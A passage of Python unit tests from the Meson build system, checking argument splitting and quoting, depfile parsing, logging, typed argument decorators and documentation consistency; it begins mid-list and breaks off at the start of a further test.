(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(sorted(deps), sorted(expdeps))
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
F = mesonbuild.dependencies.factory
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
env.scratch_dir = tmpdir
f = F.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = F.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
errors = [] # type: T.Tuple[str, Exception]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print(f'Failed to validate: "{f}"')
print(str(e))
self.assertFalse(errors)
def test_typed_pos_args_types(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], int)
self.assertIsInstance(args[2], bool)
_(None, mock.Mock(), ['string', 1, False], None)
def test_typed_pos_args_types_invalid(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1.0, False], None)
self.assertEqual(str(cm.exception), 'foo argument 2 was of type "float" but should have been "int"')
def test_typed_pos_args_types_wrong_number(self) -> None:
@typed_pos_args('foo', str, int, bool)
def _(obj, node, args: T.Tuple[str, int, bool], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1], None)
self.assertEqual(str(cm.exception), 'foo takes exactly 3 arguments, but got 2.')
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 1, True, True], None)
self.assertEqual(str(cm.exception), 'foo takes exactly 3 arguments, but got 4.')
def test_typed_pos_args_varargs(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertIsInstance(args[1][0], str)
self.assertIsInstance(args[1][1], str)
_(None, mock.Mock(), ['string', 'var', 'args'], None)
def test_typed_pos_args_varargs_not_given(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertEqual(args[1], [])
_(None, mock.Mock(), ['string'], None)
def test_typed_pos_args_varargs_invalid(self) -> None:
@typed_pos_args('foo', str, varargs=str)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 0], None)
self.assertEqual(str(cm.exception), 'foo argument 4 was of type "int" but should have been "str"')
def test_typed_pos_args_varargs_invalid_mulitple_types(self) -> None:
@typed_pos_args('foo', str, varargs=(str, list))
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 0], None)
self.assertEqual(str(cm.exception), 'foo argument 4 was of type "int" but should have been one of: "str", "list"')
def test_typed_pos_args_max_varargs(self) -> None:
@typed_pos_args('foo', str, varargs=str, max_varargs=5)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], str)
self.assertIsInstance(args[1], list)
self.assertIsInstance(args[1][0], str)
self.assertIsInstance(args[1][1], str)
_(None, mock.Mock(), ['string', 'var', 'args'], None)
def test_typed_pos_args_max_varargs_exceeded(self) -> None:
@typed_pos_args('foo', str, varargs=str, max_varargs=1)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args'], None)
self.assertEqual(str(cm.exception), 'foo takes between 1 and 2 arguments, but got 3.')
def test_typed_pos_args_min_varargs(self) -> None:
@typed_pos_args('foo', varargs=str, max_varargs=2, min_varargs=1)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertIsInstance(args, tuple)
self.assertIsInstance(args[0], list)
self.assertIsInstance(args[0][0], str)
self.assertIsInstance(args[0][1], str)
_(None, mock.Mock(), ['string', 'var'], None)
def test_typed_pos_args_min_varargs_not_met(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes at least 2 arguments, but got 1.')
def test_typed_pos_args_min_and_max_varargs_exceeded(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1, max_varargs=2)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', 'var', 'args', 'bar'], None)
self.assertEqual(str(cm.exception), 'foo takes between 2 and 3 arguments, but got 4.')
def test_typed_pos_args_min_and_max_varargs_not_met(self) -> None:
@typed_pos_args('foo', str, varargs=str, min_varargs=1, max_varargs=2)
def _(obj, node, args: T.Tuple[str, T.Tuple[str, ...]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes between 2 and 3 arguments, but got 1.')
def test_typed_pos_args_variadic_and_optional(self) -> None:
@typed_pos_args('foo', str, optargs=[str], varargs=str, min_varargs=0)
def _(obj, node, args: T.Tuple[str, T.List[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(AssertionError) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(
str(cm.exception),
'varargs and optargs not supported together as this would be ambiguous')
def test_typed_pos_args_min_optargs_not_met(self) -> None:
@typed_pos_args('foo', str, str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string'], None)
self.assertEqual(str(cm.exception), 'foo takes at least 2 arguments, but got 1.')
def test_typed_pos_args_min_optargs_max_exceeded(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertTrue(False) # should not be reachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), ['string', '1', '2'], None)
self.assertEqual(str(cm.exception), 'foo takes at most 2 arguments, but got 3.')
def test_typed_pos_args_optargs_not_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertEqual(len(args), 2)
self.assertIsInstance(args[0], str)
self.assertEqual(args[0], 'string')
self.assertIsNone(args[1])
_(None, mock.Mock(), ['string'], None)
def test_typed_pos_args_optargs_some_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str, int])
def _(obj, node, args: T.Tuple[str, T.Optional[str], T.Optional[int]], kwargs) -> None:
self.assertEqual(len(args), 3)
self.assertIsInstance(args[0], str)
self.assertEqual(args[0], 'string')
self.assertIsInstance(args[1], str)
self.assertEqual(args[1], '1')
self.assertIsNone(args[2])
_(None, mock.Mock(), ['string', '1'], None)
def test_typed_pos_args_optargs_all_given(self) -> None:
@typed_pos_args('foo', str, optargs=[str])
def _(obj, node, args: T.Tuple[str, T.Optional[str]], kwargs) -> None:
self.assertEqual(len(args), 2)
self.assertIsInstance(args[0], str)
self.assertEqual(args[0], 'string')
self.assertIsInstance(args[1], str)
_(None, mock.Mock(), ['string', '1'], None)
def test_typed_kwarg_basic(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str)
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
self.assertIsInstance(kwargs['input'], str)
self.assertEqual(kwargs['input'], 'foo')
_(None, mock.Mock(), [], {'input': 'foo'})
def test_typed_kwarg_missing_required(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str, required=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
self.assertTrue(False) # should be unreachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), [], {})
self.assertEqual(str(cm.exception), 'testfunc is missing required keyword argument "input"')
def test_typed_kwarg_missing_optional(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.Optional[str]]) -> None:
self.assertIsNone(kwargs['input'])
_(None, mock.Mock(), [], {})
def test_typed_kwarg_default(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str, default='default'),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
self.assertEqual(kwargs['input'], 'default')
_(None, mock.Mock(), [], {})
def test_typed_kwarg_container_valid(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str), required=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.List[str]]) -> None:
self.assertEqual(kwargs['input'], ['str'])
_(None, mock.Mock(), [], {'input': ['str']})
def test_typed_kwarg_container_invalid(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str), required=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.List[str]]) -> None:
self.assertTrue(False) # should be unreachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), [], {'input': {}})
self.assertEqual(str(cm.exception), 'testfunc keyword argument "input" container type was "dict", but should have been "list"')
def test_typed_kwarg_contained_invalid(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(dict, str), required=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.Dict[str, str]]) -> None:
self.assertTrue(False) # should be unreachable
with self.assertRaises(InvalidArguments) as cm:
_(None, mock.Mock(), [], {'input': {'key': 1}})
self.assertEqual(str(cm.exception), 'testfunc keyword argument "input" contained a value of type "int" but should have been "str"')
def test_typed_kwarg_container_listify(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str), listify=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.List[str]]) -> None:
self.assertEqual(kwargs['input'], ['str'])
_(None, mock.Mock(), [], {'input': 'str'})
def test_typed_kwarg_container_default_copy(self) -> None:
default: T.List[str] = []
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str), listify=True, default=default),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.List[str]]) -> None:
self.assertIsNot(kwargs['input'], default)
_(None, mock.Mock(), [], {})
def test_typed_kwarg_container_pairs(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str, pairs=True), listify=True),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, T.List[str]]) -> None:
self.assertEqual(kwargs['input'], ['a', 'b'])
_(None, mock.Mock(), [], {'input': ['a', 'b']})
with self.assertRaises(MesonException) as cm:
_(None, mock.Mock(), [], {'input': ['a']})
self.assertEqual(str(cm.exception), "testfunc keyword argument \"input\" container should be of even length, but is not")
@mock.patch.dict(mesonbuild.mesonlib.project_meson_versions, {})
def test_typed_kwarg_since(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str, since='1.0', deprecated='2.0')
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
self.assertIsInstance(kwargs['input'], str)
self.assertEqual(kwargs['input'], 'foo')
with mock.patch('sys.stdout', io.StringIO()) as out:
# With Meson 0.1 it should trigger the "introduced" warning but not the "deprecated" warning
mesonbuild.mesonlib.project_meson_versions[''] = '0.1'
_(None, mock.Mock(subproject=''), [], {'input': 'foo'})
self.assertRegex(out.getvalue(), r'WARNING:.*introduced.*input arg in testfunc')
self.assertNotRegex(out.getvalue(), r'WARNING:.*deprecated.*input arg in testfunc')
with mock.patch('sys.stdout', io.StringIO()) as out:
# With Meson 1.5 it shouldn't trigger any warning
mesonbuild.mesonlib.project_meson_versions[''] = '1.5'
_(None, mock.Mock(subproject=''), [], {'input': 'foo'})
self.assertNotRegex(out.getvalue(), r'WARNING:.*')
self.assertNotRegex(out.getvalue(), r'WARNING:.*')
with mock.patch('sys.stdout', io.StringIO()) as out:
# With Meson 2.0 it should trigger the "deprecated" warning but not the "introduced" warning
mesonbuild.mesonlib.project_meson_versions[''] = '2.0'
_(None, mock.Mock(subproject=''), [], {'input': 'foo'})
self.assertRegex(out.getvalue(), r'WARNING:.*deprecated.*input arg in testfunc')
self.assertNotRegex(out.getvalue(), r'WARNING:.*introduced.*input arg in testfunc')
def test_typed_kwarg_validator(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', str, validator=lambda x: 'invalid!' if x != 'foo' else None)
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
pass
# Should be valid
_(None, mock.Mock(), tuple(), dict(input='foo'))
with self.assertRaises(MesonException) as cm:
_(None, mock.Mock(), tuple(), dict(input='bar'))
self.assertEqual(str(cm.exception), "testfunc keyword argument \"input\" invalid!")
def test_typed_kwarg_convertor(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('native', bool, convertor=lambda n: MachineChoice.BUILD if n else MachineChoice.HOST)
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, MachineChoice]) -> None:
assert isinstance(kwargs['native'], MachineChoice)
_(None, mock.Mock(), tuple(), dict(native=True))
@mock.patch.dict(mesonbuild.mesonlib.project_meson_versions, {'': '1.0'})
def test_typed_kwarg_since_values(self) -> None:
@typed_kwargs(
'testfunc',
KwargInfo('input', ContainerTypeInfo(list, str), listify=True, default=[], deprecated_values={'foo': '0.9'}, since_values={'bar': '1.1'}),
KwargInfo('output', ContainerTypeInfo(dict, str), default={}, deprecated_values={'foo': '0.9'}, since_values={'bar': '1.1'}),
KwargInfo(
'mode', str,
validator=lambda x: 'Should be one of "clean", "build", "rebuild"' if x not in {'clean', 'build', 'rebuild', 'deprecated', 'since'} else None,
deprecated_values={'deprecated': '1.0'},
since_values={'since': '1.1'}),
)
def _(obj, node, args: T.Tuple, kwargs: T.Dict[str, str]) -> None:
pass
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'input': ['foo']})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*deprecated since '0.9': "testfunc" keyword argument "input" value "foo".*""")
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'input': ['bar']})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*introduced in '1.1': "testfunc" keyword argument "input" value "bar".*""")
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'output': {'foo': 'a'}})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*deprecated since '0.9': "testfunc" keyword argument "output" value "foo".*""")
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'output': {'bar': 'b'}})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*introduced in '1.1': "testfunc" keyword argument "output" value "bar".*""")
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'mode': 'deprecated'})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*deprecated since '1.0': "testfunc" keyword argument "mode" value "deprecated".*""")
with mock.patch('sys.stdout', io.StringIO()) as out:
_(None, mock.Mock(subproject=''), [], {'mode': 'since'})
self.assertRegex(out.getvalue(), r"""WARNING:.Project targeting '1.0'.*introduced in '1.1': "testfunc" keyword argument "mode" value "since".*""")
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options():
self.assertIn(str(opt), md)
for opt in comp.base_options:
self.assertIn(str(opt), md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError(f'Could not find "{name}" heading')
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, {
*[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS],
*[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE],
})
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError(f'Invalid debug value {debug!r} in row:\n{m.group()}')
env.coredata.set_option(OptionKey('buildtype'), buildtype)
self.assertEqual(env.coredata.options[OptionKey('buildtype')].value, buildtype)
self.assertEqual(env.coredata.options[OptionKey('optimization')].value, opt)
self.assertEqual(env.coredata.options[OptionKey('debug')].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
